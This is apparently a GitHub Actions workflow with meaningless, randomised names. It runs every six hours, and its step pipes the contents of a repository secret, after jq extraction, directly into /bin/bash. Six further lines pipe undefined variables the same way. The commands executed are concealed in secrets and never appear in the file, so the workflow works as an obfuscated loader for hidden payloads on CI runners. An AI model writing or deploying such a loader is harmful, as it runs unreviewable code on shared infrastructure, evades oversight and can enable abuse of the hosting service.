name: guyindu0918

on:
  workflow_dispatch:
  schedule:
    - cron: '4 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: guyindu0918
        env:
          ry50519: ${{ secrets.ry50519 }}
        run: |
          echo $ry50519 | jq -r .m88868 | /bin/bash
          echo $vrviw6 | jq -r .zgl8 | /bin/bash
          echo $luiu22693 | jq -r .xairq4831 | /bin/bash
          echo $npbl9 | jq -r .q2 | /bin/bash
          echo $z37 | jq -r .u44898 | /bin/bash
          echo $hgz1439 | jq -r .wke4148 | /bin/bash
          echo $pxckr255 | jq -r .br4047 | /bin/bash

